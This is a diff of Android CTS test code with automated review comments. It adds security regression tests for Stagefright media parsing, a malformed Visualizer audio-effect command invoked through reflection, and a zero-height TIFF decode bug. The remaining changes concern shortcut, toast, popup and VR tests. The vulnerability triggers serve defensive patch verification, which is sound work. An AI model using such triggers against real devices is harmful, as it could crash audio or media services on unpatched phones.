+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+
+ LooperThread thr = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ try {
+ AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(R.raw.good);
+
+ // the onErrorListener won't receive MEDIA_ERROR_SERVER_DIED until
+ // setDataSource has been called
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ } catch (Exception e) {
+ // this is a known-good file, so no failure should occur
+ fail("setDataSource of known-good file failed");
+ }
+
+ synchronized(mpcl) {
+ mpcl.notify();
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ thr.start();
+ // wait until the thread has initialized the MediaPlayer
+ synchronized(mpcl) {
+ mpcl.wait();
+ }
+
+ Resources resources = getInstrumentation().getContext().getResources();
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ MediaMetadataRetriever retriever = new MediaMetadataRetriever();
+ try {
+ retriever.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IllegalArgumentException e) {
+ // ignore
+ }
+ retriever.extractMetadata(MediaMetadataRetriever.METADATA_KEY_DURATION);
+ retriever.getEmbeddedPicture();
+ retriever.getFrameAtTime();
+
+ retriever.release();
+ String rname = resources.getResourceEntryName(rid);
+ String cve = rname.replace("_", "-").toUpperCase();
+ assertFalse("Device *IS* vulnerable to " + cve,
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ thr.stopLooper();
}
}
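Review bot: In `doStagefrightTestMediaMetadataRetriever`, `retriever.release()` and `thr.stopLooper()` are reached only when nothing throws. An exception from `extractMetadata`, `getEmbeddedPicture` or `getFrameAtTime`, or anything other than `IllegalArgumentException` from `setDataSource`, leaves the retriever, the `AssetFileDescriptor` and the looper thread behind for the next test. The new method also omits the `thr.join()` that this same hunk adds to the method above it. Wrapping the body in `try`/`finally` as below covers both. Separately, `fail(...)` inside the runnable throws on the looper thread before `mpcl.notify()` runs, so the test thread would stay blocked in `mpcl.wait()` instead of reporting the failure.

```java
MediaMetadataRetriever retriever = new MediaMetadataRetriever();
try {
    try {
        // … unchanged: setDataSource (IllegalArgumentException ignored), extractMetadata,
        //   getEmbeddedPicture, getFrameAtTime …
    } finally {
        retriever.release();
        fd.close();
    }
    // … unchanged: rname/cve computation and assertFalse on mpcl.waitForError() …
} finally {
    thr.stopLooper();
    thr.join();
}
```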
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
new file mode 100644
index 0000000..807412b
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import junit.framework.TestCase;
+
+import android.content.Context;
+import android.platform.test.annotations.SecurityTest;
+import android.media.audiofx.AudioEffect;
+import android.media.MediaPlayer;
+import android.media.audiofx.Visualizer;
+import android.test.AndroidTestCase;
+import android.test.InstrumentationTestCase;
+import android.util.Log;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Method;
+import java.util.UUID;
+
+public class VisualizerEffectTest extends InstrumentationTestCase {
+ private String TAG = "VisualizerEffectTest";
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ //Testing security bug: 30229821
+ @SecurityTest
+ public void testVisualizer_MalformedConstructor() throws Exception {
+ final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ final int VISUALIZER_CMD_MEASURE = 0x10001;
+
+ AudioEffect.Descriptor[] descriptors = AudioEffect.queryEffects();
+ int i, visualizerIndex = -1;
+ for (i = 0; i < descriptors.length; ++i) {
+ AudioEffect.Descriptor descriptor = descriptors[i];
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) == 0) {
+ visualizerIndex = i;
+
+ AudioEffect ae = null;
+ MediaPlayer mp = null;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), R.raw.good);
+ Constructor ct = AudioEffect.class.getConstructor(UUID.class, UUID.class,
+ int.class, int.class);
+ ae = (AudioEffect) ct.newInstance(descriptors[visualizerIndex].type,
+ descriptors[visualizerIndex].uuid, 0, mp.getAudioSessionId());
+ Method command = AudioEffect.class.getDeclaredMethod("command", int.class,
+ byte[].class, byte[].class);
+ Integer ret = (Integer) command.invoke(ae, new Object[]{VISUALIZER_CMD_MEASURE,
+ new byte[0], new byte[0]});
+ assertTrue("Audio server might have crashed", ret != -7);
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing visualizer");
+ } finally {
+ if (ae != null) {
+ ae.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ }
+ }
+
+ if (visualizerIndex == -1) {
+ Log.w(TAG,"No visualizer found to test");
+ }
+ }
+}
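Review bot: `testVisualizer_MalformedConstructor` passes without having tested anything in two cases: when the reflection calls throw (the `catch (Exception e)` only logs) and when no Visualizer descriptor is found. Since the check guards against an audio-server crash, the log line should at least carry the exception, `Log.w(TAG, "Problem testing visualizer", e);`, so a skipped run is distinguishable in the output. The bare `-7` in the assertion is the value of the public constant `AudioEffect.ERROR_DEAD_OBJECT`; `assertTrue("Audio server might have crashed", ret != AudioEffect.ERROR_DEAD_OBJECT);` says what is being checked. The `junit.framework.TestCase`, `Context` and `AndroidTestCase` imports are unused, and `setUp()` only calls `super`.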
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
new file mode 100644
index 0000000..bbc70a9
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class ZeroHeightTiffTest extends AndroidTestCase {
+ /**
+ * Verifies that the device fails to decode a zero height tiff file.
+ *
+ * Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
+ * With the fix, decoding will fail, without dividing by zero.
+ */
+ @SecurityTest
+ public void test_android_bug_33300701() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ assertNull(bitmap);
+ }
+}
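Review bot: `test_android_bug_33300701` never closes the `InputStream` it opens, and `assertNull(bitmap)` has no message, so a failure report does not name the bug. Both are small changes: `try (InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701)) { assertNull("Zero-height TIFF decoded (bug 33300701)", BitmapFactory.decodeStream(exploitImage)); }`, with `throws Exception` added to the method signature. The `import android.security.cts.R;` line is redundant because the test lives in that package.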
diff --git a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java
index 61f94d4..fdedc45 100644
--- a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java
+++ b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java
@@ -22,7 +22,9 @@
import android.util.Log;
import java.util.ArrayList;
+import java.util.Arrays;
import java.util.List;
+import java.util.Objects;
import java.util.concurrent.atomic.AtomicInteger;
/**
@@ -36,9 +38,14 @@
private final int mInstanceId = sNextInstanceId.getAndIncrement();
- // @GuardedBy("sReceivedIntents")
+ private static final Object sLock = new Object();
+
+ // @GuardedBy("sLock")
private static final ArrayList<Intent> sReceivedIntents = new ArrayList<>();
+ // @GuardedBy("sLock")
+ private static final ArrayList<String> sExpectedVisibleOrder = new ArrayList<>();
+
private Handler mHandler = new Handler();
private Intent mIntentToAdd;
@@ -48,6 +55,10 @@
mInstanceId, action, getIntent()));
}
+ public ShortcutLaunchedActivity() {
+ log("ctor");
+ }
+
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
@@ -63,22 +74,27 @@
log("onResume");
- synchronized (sReceivedIntents) {
+ synchronized (sLock) {
+ if (!Objects.equals(getIntent().getAction(), sExpectedVisibleOrder.get(0))) {
+ log("Not my turn yet.");
+ return;
+ }
+ sExpectedVisibleOrder.remove(0);
+
// Make sure we only add it once, ever.
if (mIntentToAdd != null) {
sReceivedIntents.add(new Intent(getIntent()));
mIntentToAdd = null;
}
}
- mHandler.post(() -> {
- onBackPressed();
- });
+ finish();
}
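Review bot: `sExpectedVisibleOrder.get(0)` throws `IndexOutOfBoundsException` when the list is empty. That is the state after `setExpectedOrder(new String[0])`, which the expected-failure tests in ShortcutManagerStartShortcutTest pass, and after the last expected activity has taken its turn. Any `onResume` delivered in that state would crash the activity instead of logging "Not my turn yet." Guarding the lookup avoids it: `if (sExpectedVisibleOrder.isEmpty() || !Objects.equals(getIntent().getAction(), sExpectedVisibleOrder.get(0))) {`. `onResume` begins outside this hunk.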
@Override
- public void onBackPressed() {
- log("onBackPressed");
- super.onBackPressed();
+ protected void onPause() {
+ log("onPause");
+
+ super.onPause();
}
@Override
@@ -88,14 +104,17 @@
super.onDestroy();
}
- public static void clearIntents() {
- synchronized (sReceivedIntents) {
+ public static void setExpectedOrder(String[] actions) {
+ synchronized (sLock) {
sReceivedIntents.clear();
+
+ sExpectedVisibleOrder.clear();
+ sExpectedVisibleOrder.addAll(Arrays.asList(actions));
}
}
public static List<Intent> getIntents() {
- synchronized (sReceivedIntents) {
+ synchronized (sLock) {
return new ArrayList(sReceivedIntents);
}
}
diff --git a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java
index e80b66e..9cf1f89 100644
--- a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java
+++ b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java
@@ -20,7 +20,6 @@
import static com.android.server.pm.shortcutmanagertest.ShortcutManagerTestUtils.retryUntil;
import static com.android.server.pm.shortcutmanagertest.ShortcutManagerTestUtils.setDefaultLauncher;
-import android.app.ActivityOptions;
import android.content.ActivityNotFoundException;
import android.content.ComponentName;
import android.content.Context;
@@ -29,8 +28,6 @@
import android.os.Bundle;
import android.test.suitebuilder.annotation.SmallTest;
-import org.junit.internal.runners.statements.ExpectException;
-
import java.util.List;
@SmallTest
@@ -45,14 +42,16 @@
}
private List<Intent> launchShortcutAndGetIntents(Context launcher, Context client,
- String id, int expectedNumIntents) {
- return launchShortcutAndGetIntents(launcher, client, id, expectedNumIntents, null, null);
+ String id, int expectedNumIntents, String[] expectedActions) {
+ return launchShortcutAndGetIntents(launcher, client, id, expectedNumIntents, null, null,
+ expectedActions);
}
private List<Intent> launchShortcutAndGetIntents(Context launcher, Context client,
- String id, int expectedNumIntents, Rect rect, Bundle options) {
+ String id, int expectedNumIntents, Rect rect, Bundle options,
+ String[] expectedActions) {
- ShortcutLaunchedActivity.clearIntents();
+ ShortcutLaunchedActivity.setExpectedOrder(expectedActions);
runWithCaller(launcher, () -> {
getLauncherApps().startShortcut(client.getPackageName(), id, rect, options,
@@ -65,8 +64,10 @@
return ShortcutLaunchedActivity.getIntents();
}
- private void assertShortcutStarts(Context launcher, Context client, String id) {
- final List<Intent> launched = launchShortcutAndGetIntents(launcher, client, id, 1);
+ private void assertShortcutStarts(Context launcher, Context client, String id,
+ String[] expectedActions) {
+ final List<Intent> launched = launchShortcutAndGetIntents(launcher, client, id, 1,
+ expectedActions);
assertTrue(launched.size() > 0);
}
@@ -81,6 +82,9 @@
});
}
+ private static final String[] EXPECTED_ACTIONS_SINGLE = new String[]{Intent.ACTION_MAIN};
+ private static final String[] EXPECTED_ACTIONS_MULTI = new String[]{"a3", "a2", "a1"};
+
/**
* Start a single activity.
*/
@@ -100,7 +104,7 @@
});
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1);
+ "s1", 1, EXPECTED_ACTIONS_SINGLE);
assertEquals(1, launched.size());
assertEquals(Intent.ACTION_MAIN, launched.get(0).getAction());
assertTrue((launched.get(0).getFlags() & Intent.FLAG_ACTIVITY_NO_ANIMATION) != 0);
@@ -132,7 +136,7 @@
});
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 3);
+ "s1", 3, EXPECTED_ACTIONS_MULTI);
assertEquals(3, launched.size());
Intent i = launched.get(2);
@@ -164,7 +168,8 @@
setDefaultLauncher(getInstrumentation(), mLauncherContext2);
// L2 can start it.
- assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1",
+ EXPECTED_ACTIONS_SINGLE);
// L1 no longer can start it.
assertShortcutCantStart(mLauncherContext1, mPackageContext1, "s1",
@@ -225,7 +230,7 @@
});
// Should still be launchable.
- assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1", EXPECTED_ACTIONS_SINGLE);
}
public void testPinnedShortcut_differentLauncher() {
@@ -249,7 +254,7 @@
setDefaultLauncher(getInstrumentation(), mLauncherContext2);
// L2 can now launch it.
- assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1", EXPECTED_ACTIONS_SINGLE);
// Then remove it.
runWithCaller(mPackageContext1, () -> {
@@ -261,14 +266,14 @@
ActivityNotFoundException.class);
// But launcher 1 can still launch it too, because it's pinned by this launcher.
- assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1", EXPECTED_ACTIONS_SINGLE);
}
public void testStartSingleWithOptions() {
testStartSingle();
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1, new Rect(1, 1, 2, 2), new Bundle());
+ "s1", 1, new Rect(1, 1, 2, 2), new Bundle(), EXPECTED_ACTIONS_SINGLE);
Intent i = launched.get(0);
assertEquals(1, i.getSourceBounds().left);
@@ -280,7 +285,7 @@
testStartMultiple();
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 3, new Rect(1, 1, 2, 2), new Bundle());
+ "s1", 3, new Rect(1, 1, 2, 2), new Bundle(), EXPECTED_ACTIONS_MULTI);
Intent i = launched.get(2);
assertEquals(1, i.getSourceBounds().left);
@@ -309,7 +314,7 @@
assertExpectException(
ActivityNotFoundException.class, "Shortcut could not be started", () -> {
launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1);
+ "s1", 1, new String[0]);
});
}
@@ -334,7 +339,7 @@
assertExpectException(
ActivityNotFoundException.class, "Shortcut could not be started", () -> {
launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1);
+ "s1", 1, new String[0]);
});
}
}
diff --git a/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java b/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
index 207e6ea..c2ecb3a 100644
--- a/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
+++ b/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
@@ -108,7 +108,10 @@
}
@Test
- public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly() throws Exception {
+ public void testAddTwoToastsViaAddingWindowApisWhenUidNotFocusedQuickly() throws Exception {
+ // Finish the activity so the UID loses focus
+ finishActivity(false);
+
try {
showToastsViaAddingWindow(2, false);
Assert.fail("Only one custom toast window at a time should be allowed");
@@ -120,6 +123,14 @@
}
@Test
+ public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly() throws Exception {
+ showToastsViaAddingWindow(2, false);
+
+ // Wait for the toast to timeout
+ waitForToastTimeout();
+ }
+
+ @Test
public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedSlowly() throws Exception {
// Add one window
showToastsViaAddingWindow(1, true);
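Review bot: The new `testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly` contains no assertion, so it is not obvious what it verifies. As written it passes when `showToastsViaAddingWindow(2, false)` returns without throwing, which appears to be the intended contrast with the not-focused variant that expects the second window to be rejected. A comment would make that explicit, e.g. `// A focused UID may add both windows; the test passes if no exception is thrown`.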
diff --git a/tests/tests/view/src/android/view/animation/cts/AnimatorInflaterTest.java b/tests/tests/view/src/android/view/animation/cts/AnimatorInflaterTest.java
index 3851e94..e8cd62c 100644
--- a/tests/tests/view/src/android/view/animation/cts/AnimatorInflaterTest.java
+++ b/tests/tests/view/src/android/view/animation/cts/AnimatorInflaterTest.java
@@ -128,6 +128,7 @@
WindowManager mWindowManager = (WindowManager) getActivity()
.getSystemService(Context.WINDOW_SERVICE);
Display display = mWindowManager.getDefaultDisplay();
+ int orientation = getActivity().getResources().getConfiguration().orientation;
Instrumentation.ActivityMonitor monitor = new Instrumentation.ActivityMonitor(
getActivity().getClass().getName(), null, false);
@@ -160,6 +161,10 @@
Log.e(TAG, "New activity orientation does not match. Canceling test");
return false;
}
+ if (getActivity().getResources().getConfiguration().orientation == orientation) {
+ Log.e(TAG, "Screen orientation didn't change, test is canceled");
+ return false;
+ }
return true;
}
diff --git a/tests/tests/widget/res/layout/popup_window_scrollable.xml b/tests/tests/widget/res/layout/popup_window_scrollable.xml
new file mode 100644
index 0000000..aa1edd6
--- /dev/null
+++ b/tests/tests/widget/res/layout/popup_window_scrollable.xml
@@ -0,0 +1,101 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<ScrollView
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+
+ <RelativeLayout
+ android:id="@+id/main_container"
+ android:layout_width="10000dp"
+ android:layout_height="10000dp">
+
+ <View
+ android:id="@+id/anchor_upper_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_upper"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_upper_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_middle_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_middle"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_middle_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_lower_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ <View
+ android:id="@+id/anchor_lower"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ <View
+ android:id="@+id/anchor_lower_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ </RelativeLayout>
+
+</ScrollView>
\ No newline at end of file
diff --git a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
index 47efffc..918a161 100644
--- a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
+++ b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
@@ -16,6 +16,14 @@
package android.widget.cts;
+import static org.mockito.Matchers.anyInt;
+import static org.mockito.Mockito.any;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.times;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
import android.app.Activity;
import android.app.Instrumentation;
import android.content.Context;
@@ -44,13 +52,6 @@
import android.widget.TextView;
import android.widget.cts.R;
-import static org.mockito.Mockito.any;
-import static org.mockito.Mockito.mock;
-import static org.mockito.Mockito.never;
-import static org.mockito.Mockito.times;
-import static org.mockito.Mockito.verify;
-import static org.mockito.Mockito.when;
-
public class PopupWindowTest extends
ActivityInstrumentationTestCase2<PopupWindowCtsActivity> {
private Instrumentation mInstrumentation;
@@ -772,7 +773,19 @@
WindowManager.LayoutParams.FLAG_ALT_FOCUSABLE_IM & p.flags);
}
- public void testEnterExitTransition() {
+ public void testEnterExitTransitionAsDropDown() throws Throwable {
+ final View anchorView = mActivity.findViewById(R.id.anchor_upper);
+ verifyEnterExitTransition(
+ () -> mPopupWindow.showAsDropDown(anchorView, 0, 0));
+ }
+
+ public void testEnterExitTransitionAtLocation() throws Throwable {
+ final View anchorView = mActivity.findViewById(R.id.anchor_upper);
+ verifyEnterExitTransition(
+ () -> mPopupWindow.showAtLocation(anchorView, Gravity.BOTTOM, 0, 0));
+ }
+
+ private void verifyEnterExitTransition(Runnable showRunnable) throws Throwable {
TransitionListener enterListener = mock(TransitionListener.class);
Transition enterTransition = new BaseTransition();
enterTransition.addListener(enterListener);
@@ -791,8 +804,7 @@
verify(exitListener, never()).onTransitionStart(any(Transition.class));
verify(dismissListener, never()).onDismiss();
- final View anchorView = mActivity.findViewById(R.id.anchor_upper);
- mInstrumentation.runOnMainSync(() -> mPopupWindow.showAsDropDown(anchorView, 0, 0));
+ mInstrumentation.runOnMainSync(showRunnable);
mInstrumentation.waitForIdleSync();
verify(enterListener, times(1)).onTransitionStart(any(Transition.class));
verify(exitListener, never()).onTransitionStart(any(Transition.class));
@@ -1069,6 +1081,30 @@
assertEquals(LayoutParams.MATCH_PARENT, p.height);
}
+ public void testPositionAfterParentScroll() {
+ View.OnScrollChangeListener scrollChangeListener = mock(
+ View.OnScrollChangeListener.class);
+
+ getInstrumentation().runOnMainSync(() -> {
+ mActivity.setContentView(R.layout.popup_window_scrollable);
+
+ View anchor = mActivity.findViewById(R.id.anchor_upper);
+ PopupWindow window = createPopupWindow();
+ window.showAsDropDown(anchor);
+ });
+
+ getInstrumentation().runOnMainSync(() -> {
+ View parent = mActivity.findViewById(R.id.main_container);
+ parent.scrollBy(0, 500);
+ parent.setOnScrollChangeListener(scrollChangeListener);
+ });
+
+ getInstrumentation().waitForIdleSync();
+
+ verify(scrollChangeListener, never()).onScrollChange(
+ any(View.class), anyInt(), anyInt(), anyInt(), anyInt());
+ }
+
private static class BaseTransition extends Transition {
@Override
public void captureStartValues(TransitionValues transitionValues) {}
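Review bot: In `testPositionAfterParentScroll` the listener is attached after `parent.scrollBy(0, 500)`, which is easy to read as a mistake because the scroll itself is then never observed. Presumably the order is deliberate, so that `verify(..., never())` only counts scroll changes caused by the popup following its anchor. A comment such as `// Attach after scrollBy() so only scroll changes triggered by the popup are counted` would say so. The `PopupWindow` created inside the first lambda is a local that the test never dismisses, so it may still be showing when the next test runs unless teardown elsewhere handles it.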
diff --git a/tests/vr/src/android/vr/cts/VrDisplayTest.java b/tests/vr/src/android/vr/cts/VrDisplayTest.java
index 9dfdf96..b26f4ed 100644
--- a/tests/vr/src/android/vr/cts/VrDisplayTest.java
+++ b/tests/vr/src/android/vr/cts/VrDisplayTest.java
@@ -52,18 +52,20 @@
*/
public void testRefreshRateIsAtLeast60Hz() throws Throwable {
final int NUM_FRAMES = 200;
- mActivity = getGlEsActivity(NUM_FRAMES, 3);
+ // Add an extra frame to allow the activity to start up.
+ mActivity = getGlEsActivity(NUM_FRAMES + 1, 3);
if (!mActivity.supportsVrHighPerformance())
return;
- long startNanos = System.nanoTime();
+ // Skip the first frame to allow for startup time.
+ mActivity.waitForFrameDrawn();
// Render a few hundred frames.
- int error;
+ long startNanos = System.nanoTime();
while (!mActivity.waitForFrameDrawn());
- error = mActivity.glGetError();
- assertEquals(GLES32.GL_NO_ERROR, error);
long endNanos = System.nanoTime();
+ int error = mActivity.glGetError();
+ assertEquals(GLES32.GL_NO_ERROR, error);
double fps = NUM_FRAMES / (double)(endNanos - startNanos) * 1e9;
assertTrue(fps >= 59.);
diff --git a/tools/cts-tradefed/res/config/cts-sts.xml b/tools/cts-tradefed/res/config/cts-sts.xml
new file mode 100644
index 0000000..8e4c030
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-sts.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Runs Security Patch test cases">
+
+ <option name="plan" value="cts-sts" />
+
+ <include name="cts"/>
+
+ <option name="compatibility:include-filter" value="CtsSecurityTestCases" />
+
+ <option name="compatibility:include-filter" value="CtsSecurityHostTestCases" />
+
+ <!-- Only run tests with @SecurityTest annotation. -->
+ <option name="compatibility:module-arg" value="CtsSecurityHostTestCases:include-annotation:android.platform.test.annotations.SecurityTest"/>
+
+ <option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:include-annotation:android.platform.test.annotations.SecurityTest" />
+
+</configuration>